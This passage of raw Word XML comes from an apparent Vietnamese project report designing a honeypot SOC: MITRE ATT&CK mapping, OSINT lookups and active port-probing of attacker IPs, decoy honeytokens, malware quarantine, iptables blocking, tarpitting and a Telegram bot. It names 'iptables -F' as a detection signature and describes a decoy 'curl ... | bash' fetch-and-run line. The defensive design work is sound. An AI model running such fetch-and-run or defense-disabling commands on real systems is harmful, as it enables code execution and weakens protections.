          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ingress Tool Transfer</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cách ly Sandbox + Quét VirusTotal</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A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input (iptables -F)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.001</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impair Defenses: Disable Tools</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Gửi cảnh báo khẩn cấp cho SOC</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AB">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AC">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086100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586919"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4864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3.2: Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">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3.4 Thiết kế Phân hệ Trinh sát ngược Kẻ tấn công (Reverse Intelligence Engine)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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Khác với cách tiếp cận phòng thủ thụ động truyền thống (chỉ nhìn thấy IP mà không biết thông tin đối phương), Phân hệ Trinh sát ngược (Reverse Intelligence) được thiết kế để tự động thực thi chu trình điều tra tình báo nguồn mở (OSINT Pipeline) ngay trong mili-giây đầu tiên khi phát hiện IP tấn công:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Phân giải Địa lý &amp; Nhà mạng (GeoIP &amp; ASN Profiling): Truy vấn dịch vụ phân giải địa chỉ IP để xác định quốc gia, thành phố, tọa độ địa lý, mã hệ thống tự trị (ASN) và tổ chức sở hữu dải mạng (ISP). Điều này giúp phân biệt ngay lập tức giữa các máy chủ đặt tại Datacenter (AWS, DigitalOcean, OVH) với các dải mạng người dùng băng thông rộng dân dụng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Tra cứu Cơ sở Dữ liệu Danh tính Mã độc Toàn cầu (AbuseIPDB Reputation API): Gửi truy vấn kiểm tra lịch sử vi phạm của IP trong vòng 90 ngày gần nhất. Hệ thống trích xuất chỉ số 'Abuse Confidence Score' (từ 0 đến 100%). Nếu điểm số &gt; 40%, IP được tự động gán nhãn là 'Known Cybercrime Infrastructure'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Tra cứu Thiết bị &amp; Lỗ hổng Mở (Shodan Host Intelligence API): Kết nối Shodan API để thu thập danh sách các cổng dịch vụ mở (Open Ports), các lỗ hổng CVE chưa được vá và hệ điều hành ước tính của máy chủ tấn công.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Kỹ thuật Quét cổng Ngược An toàn (Safe Reverse Port Probing): Module chủ động thực hiện kiểm tra bắt tay TCP 3 bước (TCP SYN Connect) tới 10 cổng then chốt của IP tấn công (21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888) với thời gian timeout cực ngắn (300ms). Dựa trên kết quả trả về, hệ thống phân loại chính xác hình thái đối thủ:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Nếu mở cổng 23 (Telnet) hoặc 80 (Web camera): Phân loại là 'Compromised IoT / Botnet Node (Mirai variant)'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Nếu mở cổng 1080, 3128, 8080: Phân loại là 'Anonymized Proxy / Tor Node'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Nếu điểm AbuseIPDB &gt; 75%: Phân loại là 'Automated Scanner Infrastructure'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">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3.5 Thiết kế Phân hệ Đánh lừa &amp; Bẫy Mồi Khử ẩn danh (Active Honeytoken Deception Engine)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Nhằm đối phó với những kẻ tấn công chuyên nghiệp sử dụng mạng ẩn danh (VPN, Tor, Proxy) để che giấu nguồn gốc khi SSH vào Honeypot, Phân hệ Active Deception Engine được thiết kế với nhiệm vụ kiến tạo một môi trường 'mồi nhử hoàn hảo' (Realistic Honey Environment):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Hệ thống tự động sinh ra và cài cắm 3 lớp tài liệu mồi nhử (Decoy Breadcrumbs):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Fake AWS Credentials ('/root/.aws/credentials'): Giả lập tệp tin cấu hình tài khoản Amazon Web Services có quyền quản trị cao nhất đối với cụm máy chủ sao lưu cơ sở dữ liệu. Trong tệp tin này, một URL kiểm tra ngầm (Canary Endpoint) được nhúng khéo léo vào phần chú thích mã nguồn.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Fake Bash History ('/root/.bash_history'): Giả lập lịch sử thao tác dòng lệnh của người quản trị máy chủ, trong đó chứa một câu lệnh tải bản vá bảo mật khẩn cấp (curl -s http://.../patch.sh | bash) trỏ tới máy chủ Webhook của Blue Team.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Fake Database Dump ('/var/backups/db_backup_2026.sql'): Giả lập tệp tin sao lưu cơ sở dữ liệu MySQL chứa các bảng tài khoản người dùng, mật khẩu quản trị và đường link truy cập vào cổng quản trị nội bộ (SSO Authentication Portal).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Nguyên lý Khử ẩn danh: Khi kẻ tấn công đánh cắp các tệp tin này và mang về máy tính cá nhân để khai thác, việc click vào đường link hoặc chạy lệnh sẽ kích hoạt một Webhook HTTP Request gửi thẳng từ máy thật của hacker về máy chủ SOC. Lúc này, toàn bộ lớp vỏ bọc VPN/Proxy mà hacker dùng để SSH vào Honeypot trước đó sẽ bị vô hiệu hóa hoàn toàn, để lộ địa chỉ IP thật và thông số hệ thống của thủ phạm.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">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086100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586924"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4864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3.3: Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">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3.6 Thiết kế Phân hệ Phân tích và Cách ly Mã độc (Malware Sandbox &amp; Staging Pipeline)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Khi kẻ tấn công sử dụng các công cụ truyền tệp tin (wget, curl, tftp, sftp) để đưa mã độc vào máy bẫy, Phân hệ Malware Staging tự động kích hoạt chu trình phân tích gồm 4 pha:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Pha 1 - Tự động Cách ly (Automated Quarantine): Mã độc được di chuyển ngay lập tức vào thư mục cô lập an toàn, gắn cờ quyền chỉ đọc (Read-only) và vô hiệu hóa quyền thực thi (chmod -x) để ngăn chặn mã độc tự kích hoạt ngoài ý muốn.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Pha 2 - Tính toán Mã băm Toàn vẹn (Cryptographic Hashing): Tính toán băm MD5 và SHA256 của tệp tin để tạo ra mã nhận dạng duy nhất (Unique IOC Identifier).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Pha 3 - Trích xuất Chuỗi Tĩnh (Static String Extraction &amp; Regex Pattern Matching): Quét toàn bộ nội dung tệp tin để tìm kiếm các địa chỉ IP máy chủ C2, các tên miền độc hại, các câu lệnh tạo backdoor và nhận diện chữ ký của các dòng họ mã độc nổi tiếng (như chữ ký của Mirai botnet, Gafgyt, hoặc XMRig Miner).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Pha 4 - Tích hợp Tình báo VirusTotal API: Tự động gửi mã băm SHA256 lên nền tảng VirusTotal để tra cứu tỷ lệ nhận diện độc hại (Detection Ratio), tên phân loại mã độc theo tiêu chuẩn của các hãng diệt virus hàng đầu thế giới (Kaspersky, Microsoft, CrowdStrike).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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3.7 Thiết kế Động cơ Thực thi Phản ứng SOAR (Firewall Enforcer &amp; Tarpitting)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Động cơ Thực thi SOAR (SOAR Enforcer) chuyển đổi các quyết định phân tích thành hành động tác chiến cụ thể trên hạ tầng mạng:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Thực thi Chặn Tường lửa Động (Dynamic Firewall Enforcement): Hỗ trợ tích hợp đa nền tảng. Trên máy chủ Linux, module trực tiếp gọi tiện ích 'iptables' hoặc 'nftables' để chèn luật chặn gói tin ở mức nhân hệ điều hành: 'iptables -I INPUT -s &lt;IP&gt; -j DROP'. Trên môi trường Windows, module sử dụng 'netsh advfirewall'. Hệ thống có cơ chế kiểm tra Whitelist (danh sách trắng) để bảo vệ an toàn cho các địa chỉ IP quản trị của nhà trường/doanh nghiệp.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Động cơ Giam lỏng Tarpit (Connection Tarpitting Engine): Khi phát hiện kẻ tấn công là một botnet quét tự động, thay vì ngắt kết nối (khiến botnet chuyển sang quét mục tiêu khác), SOAR Enforcer sử dụng cơ chế NAT chuyển hướng gói tin: 'iptables -t nat -A PREROUTING -p tcp -s &lt;IP&gt; --dport 2222 -j REDIRECT --to-ports 22222'. Tại cổng 22222, dịch vụ Endlessh Tarpit sẽ giam giữ kết nối của kẻ tấn công bằng cách truyền từng byte dữ liệu banner cách nhau 10 giây, khóa cứng tiến trình của hacker và làm kiệt quệ tài nguyên máy tấn công.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Xuất bản Danh sách đen Đe dọa (Threat Feed Export): Mọi địa chỉ IP bị chặn đều được tự động đồng bộ ra tệp tin chuẩn 'data/threat_intel_feed.txt' để chia sẻ cho các hệ thống tường lửa biên khác trong mạng nội bộ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">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3.8 Thiết kế Giao diện Giám sát &amp; Điều khiển Tương tác 2 Chiều (Telegram SOAR Bot)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Một điểm nhấn quan trọng giúp đồ án vượt xa các ứng dụng gửi thông báo thông thường là thiết kế Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Giao diện Cảnh báo Trực quan: Thay vì gửi văn bản thô, Bot xuất bản các Thẻ Cảnh báo (Incident Cards) định dạng HTML chuyên nghiệp với icon mức độ nguy hại, thông tin chi tiết về kẻ tấn công, mã kỹ thuật MITRE ATT&amp;CK và kết quả trinh sát nhanh.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Bàn phím Hành động Tức thì (Inline Keyboard Actions): Mỗi thông báo sự cố đều đi kèm một cụm 4 nút bấm tương tác:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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 [Trinh sát ngược OSINT]: Kích hoạt lệnh quét sâu và gửi lại báo cáo tình báo chi tiết về IP.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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 [Chặn Firewall tức thì]: Ra lệnh cho SOAR Enforcer khóa IP trên Tường lửa ngay lập tức.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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 [Đưa vào Tarpit]: Điều hướng IP vào hố nhựa đường Tarpit để làm tiêu hao tài nguyên đối phương.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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 [Mở khóa IP]: Giải phóng IP khỏi danh sách chặn nếu xác định đây là kết nối nhầm lẫn hợp lệ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Cơ chế này giúp chuyên viên SOC có thể điều hành tác chiến từ bất kỳ đâu thông qua điện thoại thông minh mà không cần phải mở máy tính và đăng nhập vào máy chủ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
